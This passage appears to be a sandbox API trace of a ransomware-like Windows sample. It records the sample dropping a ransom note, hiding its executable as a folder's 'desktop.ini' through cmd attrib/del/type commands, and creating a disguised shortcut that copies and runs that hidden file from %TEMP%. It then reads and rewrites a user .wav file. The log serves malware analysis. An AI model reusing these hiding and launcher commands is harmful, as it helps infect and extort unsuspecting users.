lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\") returned 0x1e [0224.261] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0224.261] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0224.262] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa14, dwThreadId=0x7f8)) returned 1 [0224.278] CloseHandle (hObject=0x120) returned 1 [0224.278] CloseHandle (hObject=0x1b4) returned 1 [0224.278] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\bl0cked-readme.rtf")) returned 0xffffffff [0224.278] GetLastError () returned 0x2 [0224.278] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0224.288] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\bl0cked-readme.rtf")) returned 0x20 [0224.288] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0224.288] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0224.289] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0224.289] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0224.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0224.289] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0224.289] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0224.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\") returned 0x1e [0224.289] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0224.289] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0224.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y") returned 0x1d [0224.290] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x132 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x132 [0224.290] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0224.290] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc84, dwThreadId=0xdac)) returned 1 [0224.419] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0226.386] CloseHandle (hObject=0x1b4) returned 1 [0226.386] CloseHandle (hObject=0x120) returned 1 [0226.386] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0226.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0226.386] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0226.386] GetTickCount () returned 0x3e780 [0226.386] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=28317542117) returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x41\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x76\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0226.387] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0226.387] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0226.387] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0226.387] CharUpperBuffW (in: lpsz="explorer.exe \"Lp6Y\" & type \"Lp6Y\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x59 | out: lpsz="EXPLORER.EXE \"LP6Y\" & TYPE \"LP6Y\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x59 [0226.387] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0226.387] CharUpperBuffW (in: lpsz="explorer.exe \"Lp6Y\" & type \"Lp6Y\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5a | out: lpsz="EXPLORER.EXE \"LP6Y\" & TYPE \"LP6Y\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5a [0226.387] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0226.387] CoInitialize (pvReserved=0x0) returned 0x0 [0226.387] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0226.389] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0226.389] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0226.389] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0226.391] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Lp6Y\" & type \"Lp6Y\\desktop.ini\" > \"%TEMP%\\xAq6pxJv.exe\" && \"%TEMP%\\xAq6pxJv.exe\"") returned 0x0 [0226.391] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0226.391] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0226.391] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0226.391] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y.lnk", fRemember=0) returned 0x0 [0226.777] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0226.777] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0226.777] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0226.777] CoUninitialize () [0226.778] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0226.778] ReleaseMutex (hMutex=0xf8) returned 1 [0226.778] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0226.778] ReleaseMutex (hMutex=0xf8) returned 1 [0226.778] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0226.778] ReleaseMutex (hMutex=0xf8) returned 1 [0226.778] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0226.778] ReleaseMutex (hMutex=0xf8) returned 1 [0226.778] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm5ag7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0226.778] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.778] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.779] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.779] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28357192124) returned 1 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x8deb [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.783] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8deb [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0226.784] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x8903 [0226.784] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x8deb [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x8deb [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0226.789] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0226.789] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x46f4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x46f4, lpOverlapped=0x0) returned 1 [0226.790] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0226.790] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x46f4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x46f4, lpOverlapped=0x0) returned 1 [0226.790] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-18164, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x46f7 [0226.790] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x46f4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x46f4, lpOverlapped=0x0) returned 1 [0226.790] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-18164, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x46f7 [0226.790] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x46f4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x46f4, lpOverlapped=0x0) returned 1 [0226.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cii3Zm5ag7.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0226.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cii3Zm5ag7.wav", cchWideChar=14, lpMultiByteStr=0x131324c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 